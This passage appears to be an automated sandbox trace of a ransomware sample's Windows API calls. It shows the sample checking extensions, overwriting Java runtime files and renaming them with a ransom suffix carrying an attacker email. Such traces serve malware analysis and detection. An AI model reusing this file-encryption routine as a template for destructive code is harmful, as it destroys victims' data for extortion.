lstrlenW (lpString=".rar") returned 4 [0199.246] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0199.246] lstrlenW (lpString=".bz2") returned 4 [0199.246] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0199.246] lstrlenW (lpString=".7z") returned 3 [0199.246] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0199.246] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.246] lstrlenW (lpString=".dbf") returned 4 [0199.246] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0199.246] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.246] lstrlenW (lpString=".1cd") returned 4 [0199.246] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0199.246] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe") returned 54 [0199.246] lstrlenW (lpString=".jpg") returned 4 [0199.246] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0199.246] lstrcmpiW (lpString1=".jsa", lpString2=".bat") returned 1 [0199.246] lstrlenW (lpString="classes.jsa") returned 11 [0199.246] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0199.247] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=18677760) returned 1 [0199.247] CloseHandle (hObject=0x334) returned 1 [0199.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa")) returned 0x21 [0199.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa", dwFileAttributes=0x20) returned 1 [0199.248] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0199.257] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0199.257] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fc64 | out: lpNewFilePointer=0x0) returned 1 [0199.257] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fc24 | out: lpNewFilePointer=0x0) returned 1 [0199.257] ReadFile (in: hFile=0x334, lpBuffer=0x426c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x389fc30, lpOverlapped=0x0 | out: lpBuffer=0x426c058*, lpNumberOfBytesRead=0x389fc30*=0x40000, lpOverlapped=0x0) returned 1 [0199.258] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x5f0000, lpNewFilePointer=0x0, dwMoveMethod=0x389fc24 | out: lpNewFilePointer=0x0) returned 1 [0199.258] ReadFile (in: hFile=0x334, lpBuffer=0x42ac058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x389fc30, lpOverlapped=0x0 | out: lpBuffer=0x42ac058*, lpNumberOfBytesRead=0x389fc30*=0x40000, lpOverlapped=0x0) returned 1 [0199.263] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x389fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0199.263] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x1190000, lpNewFilePointer=0x0, dwMoveMethod=0x389fc24 | out: lpNewFilePointer=0x0) returned 1 [0199.263] ReadFile (in: hFile=0x334, lpBuffer=0x42ec058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x389fc30, lpOverlapped=0x0 | out: lpBuffer=0x42ec058*, lpNumberOfBytesRead=0x389fc30*=0x40000, lpOverlapped=0x0) returned 1 [0199.280] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.280] WriteFile (in: hFile=0x334, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x389fca8, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fca8*=0xc0102, lpOverlapped=0x0) returned 1 [0199.388] SetEndOfFile (hFile=0x334) returned 1 [0199.388] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40000) returned 0x44250b0 [0199.391] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fc74 | out: lpNewFilePointer=0x0) returned 1 [0199.391] WriteFile (in: hFile=0x334, lpBuffer=0x44250b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x389fc80, lpOverlapped=0x0 | out: lpBuffer=0x44250b0*, lpNumberOfBytesWritten=0x389fc80*=0x40000, lpOverlapped=0x0) returned 1 [0199.393] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x5f0000, lpNewFilePointer=0x0, dwMoveMethod=0x389fc74 | out: lpNewFilePointer=0x0) returned 1 [0199.393] WriteFile (in: hFile=0x334, lpBuffer=0x44250b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x389fc80, lpOverlapped=0x0 | out: lpBuffer=0x44250b0*, lpNumberOfBytesWritten=0x389fc80*=0x40000, lpOverlapped=0x0) returned 1 [0199.398] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x1190000, lpNewFilePointer=0x0, dwMoveMethod=0x389fc74 | out: lpNewFilePointer=0x0) returned 1 [0199.398] WriteFile (in: hFile=0x334, lpBuffer=0x44250b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x389fc80, lpOverlapped=0x0 | out: lpBuffer=0x44250b0*, lpNumberOfBytesWritten=0x389fc80*=0x40000, lpOverlapped=0x0) returned 1 [0199.400] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0199.400] CloseHandle (hObject=0x334) returned 1 [0199.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x21) returned 1 [0199.401] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.401] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.401] lstrlenW (lpString=".doc") returned 4 [0199.401] lstrcmpiW (lpString1=".doc", lpString2=".jsa") returned -1 [0199.401] lstrlenW (lpString=".docx") returned 5 [0199.401] lstrcmpiW (lpString1=".docx", lpString2="s.jsa") returned -1 [0199.401] lstrlenW (lpString=".pdf") returned 4 [0199.401] lstrcmpiW (lpString1=".pdf", lpString2=".jsa") returned 1 [0199.401] lstrlenW (lpString=".xls") returned 4 [0199.401] lstrcmpiW (lpString1=".xls", lpString2=".jsa") returned 1 [0199.401] lstrlenW (lpString=".xlsx") returned 5 [0199.401] lstrcmpiW (lpString1=".xlsx", lpString2="s.jsa") returned -1 [0199.401] lstrlenW (lpString=".ppt") returned 4 [0199.401] lstrcmpiW (lpString1=".ppt", lpString2=".jsa") returned 1 [0199.401] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.401] lstrlenW (lpString=".zip") returned 4 [0199.401] lstrcmpiW (lpString1=".zip", lpString2=".jsa") returned 1 [0199.401] lstrlenW (lpString=".rar") returned 4 [0199.401] lstrcmpiW (lpString1=".rar", lpString2=".jsa") returned 1 [0199.402] lstrlenW (lpString=".bz2") returned 4 [0199.402] lstrcmpiW (lpString1=".bz2", lpString2=".jsa") returned -1 [0199.402] lstrlenW (lpString=".7z") returned 3 [0199.402] lstrcmpiW (lpString1=".7z", lpString2="jsa") returned -1 [0199.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.402] lstrlenW (lpString=".dbf") returned 4 [0199.402] lstrcmpiW (lpString1=".dbf", lpString2=".jsa") returned -1 [0199.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.402] lstrlenW (lpString=".1cd") returned 4 [0199.402] lstrcmpiW (lpString1=".1cd", lpString2=".jsa") returned -1 [0199.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.402] lstrlenW (lpString=".jpg") returned 4 [0199.402] lstrcmpiW (lpString1=".jpg", lpString2=".jsa") returned -1 [0199.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.402] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.402] lstrlenW (lpString=".doc") returned 4 [0199.402] lstrcmpiW (lpString1=".doc", lpString2=".jsa") returned -1 [0199.402] lstrlenW (lpString=".docx") returned 5 [0199.402] lstrcmpiW (lpString1=".docx", lpString2="s.jsa") returned -1 [0199.402] lstrlenW (lpString=".pdf") returned 4 [0199.402] lstrcmpiW (lpString1=".pdf", lpString2=".jsa") returned 1 [0199.402] lstrlenW (lpString=".xls") returned 4 [0199.402] lstrcmpiW (lpString1=".xls", lpString2=".jsa") returned 1 [0199.402] lstrlenW (lpString=".xlsx") returned 5 [0199.402] lstrcmpiW (lpString1=".xlsx", lpString2="s.jsa") returned -1 [0199.402] lstrlenW (lpString=".ppt") returned 4 [0199.403] lstrcmpiW (lpString1=".ppt", lpString2=".jsa") returned 1 [0199.403] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.403] lstrlenW (lpString=".zip") returned 4 [0199.403] lstrcmpiW (lpString1=".zip", lpString2=".jsa") returned 1 [0199.403] lstrlenW (lpString=".rar") returned 4 [0199.403] lstrcmpiW (lpString1=".rar", lpString2=".jsa") returned 1 [0199.403] lstrlenW (lpString=".bz2") returned 4 [0199.403] lstrcmpiW (lpString1=".bz2", lpString2=".jsa") returned -1 [0199.403] lstrlenW (lpString=".7z") returned 3 [0199.403] lstrcmpiW (lpString1=".7z", lpString2="jsa") returned -1 [0199.403] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.403] lstrlenW (lpString=".dbf") returned 4 [0199.403] lstrcmpiW (lpString1=".dbf", lpString2=".jsa") returned -1 [0199.403] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.403] lstrlenW (lpString=".1cd") returned 4 [0199.403] lstrcmpiW (lpString1=".1cd", lpString2=".jsa") returned -1 [0199.403] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 57 [0199.403] lstrlenW (lpString=".jpg") returned 4 [0199.403] lstrcmpiW (lpString1=".jpg", lpString2=".jsa") returned -1 [0199.403] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0199.403] lstrlenW (lpString="splashscreen.dll") returned 16 [0199.403] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0199.404] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=204864) returned 1 [0199.404] CloseHandle (hObject=0x334) returned 1 [0199.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll")) returned 0x20 [0199.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.404] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0199.405] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.405] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.405] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0199.405] GetLastError () returned 0x0 [0199.405] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x32040, lpOverlapped=0x0) returned 1 [0199.980] WriteFile (in: hFile=0x398, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x32050, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x32050, lpOverlapped=0x0) returned 1 [0199.984] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.984] WriteFile (in: hFile=0x398, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xf4, lpOverlapped=0x0) returned 1 [0199.984] SetEndOfFile (hFile=0x398) returned 1 [0200.462] CloseHandle (hObject=0x398) returned 1 [0200.462] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.462] SetEndOfFile (hFile=0x334) returned 1 [0200.464] CloseHandle (hObject=0x334) returned 1 [0200.464] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0200.465] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\splashscreen.dll")) returned 1 [0200.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.465] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.465] lstrlenW (lpString=".doc") returned 4 [0200.465] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0200.465] lstrlenW (lpString=".docx") returned 5 [0200.465] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0200.465] lstrlenW (lpString=".pdf") returned 4 [0200.465] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0200.465] lstrlenW (lpString=".xls") returned 4 [0200.465] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0200.465] lstrlenW (lpString=".xlsx") returned 5 [0200.465] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0200.466] lstrlenW (lpString=".ppt") returned 4 [0200.466] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0200.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.466] lstrlenW (lpString=".zip") returned 4 [0200.466] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0200.466] lstrlenW (lpString=".rar") returned 4 [0200.466] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0200.466] lstrlenW (lpString=".bz2") returned 4 [0200.466] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0200.466] lstrlenW (lpString=".7z") returned 3 [0200.466] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0200.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.466] lstrlenW (lpString=".dbf") returned 4 [0200.466] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0200.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.466] lstrlenW (lpString=".1cd") returned 4 [0200.466] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0200.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.466] lstrlenW (lpString=".jpg") returned 4 [0200.466] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0200.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.466] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.466] lstrlenW (lpString=".doc") returned 4 [0200.466] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0200.466] lstrlenW (lpString=".docx") returned 5 [0200.466] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0200.466] lstrlenW (lpString=".pdf") returned 4 [0200.466] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0200.467] lstrlenW (lpString=".xls") returned 4 [0200.467] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0200.467] lstrlenW (lpString=".xlsx") returned 5 [0200.467] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0200.467] lstrlenW (lpString=".ppt") returned 4 [0200.467] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0200.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.467] lstrlenW (lpString=".zip") returned 4 [0200.467] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0200.467] lstrlenW (lpString=".rar") returned 4 [0200.467] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0200.467] lstrlenW (lpString=".bz2") returned 4 [0200.467] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0200.467] lstrlenW (lpString=".7z") returned 3 [0200.467] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0200.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.467] lstrlenW (lpString=".dbf") returned 4 [0200.467] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0200.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.467] lstrlenW (lpString=".1cd") returned 4 [0200.467] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0200.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\splashscreen.dll") returned 55 [0200.467] lstrlenW (lpString=".jpg") returned 4 [0200.467] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0200.467] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0200.467] lstrlenW (lpString="unpack200.exe") returned 13 [0200.468] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0200.469] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=197184) returned 1 [0200.469] CloseHandle (hObject=0x334) returned 1 [0200.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe")) returned 0x20 [0200.469] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0200.469] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0200.470] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.470] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.470] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0200.470] GetLastError () returned 0x0 [0200.470] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x30240, lpOverlapped=0x0) returned 1 [0200.592] WriteFile (in: hFile=0x398, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x30250, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x30250, lpOverlapped=0x0) returned 1 [0200.595] ReadFile (in: hFile=0x334, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.596] WriteFile (in: hFile=0x398, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xee, lpOverlapped=0x0) returned 1 [0200.596] SetEndOfFile (hFile=0x398) returned 1 [0200.596] CloseHandle (hObject=0x398) returned 1 [0200.596] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.596] SetEndOfFile (hFile=0x334) returned 1 [0200.598] CloseHandle (hObject=0x334) returned 1 [0200.598] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0200.598] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe")) returned 1 [0200.598] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.598] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.598] lstrlenW (lpString=".doc") returned 4 [0200.598] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0200.598] lstrlenW (lpString=".docx") returned 5 [0200.598] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0200.598] lstrlenW (lpString=".pdf") returned 4 [0200.598] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0200.598] lstrlenW (lpString=".xls") returned 4 [0200.598] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0200.598] lstrlenW (lpString=".xlsx") returned 5 [0200.598] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0200.598] lstrlenW (lpString=".ppt") returned 4 [0200.598] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0200.598] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.598] lstrlenW (lpString=".zip") returned 4 [0200.598] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0200.598] lstrlenW (lpString=".rar") returned 4 [0200.599] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0200.599] lstrlenW (lpString=".bz2") returned 4 [0200.599] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0200.599] lstrlenW (lpString=".7z") returned 3 [0200.599] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0200.599] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.599] lstrlenW (lpString=".dbf") returned 4 [0200.599] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0200.599] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.599] lstrlenW (lpString=".1cd") returned 4 [0200.599] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0200.599] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.599] lstrlenW (lpString=".jpg") returned 4 [0200.599] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0200.599] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.599] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe") returned 52 [0200.599] lstrlenW (lpString=".doc") returned 4 [0200.599] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0200.599] lstrlenW (lpString=".docx") returned 5 [0200.599] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0200.599] lstrlenW (lpString=".pdf") returned 4 [0200.599] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0200.599] lstrlenW (lpString=".xls") returned 4 [0200.599] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0200.599] lstrlenW (lpString=".xlsx") returned 5 [0200.599] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0200.600] lstrlenW (lpString=".ppt") returned 4 [0200.600] lstrcmpiW (lpString1=".ppt", lpString2=".exe") 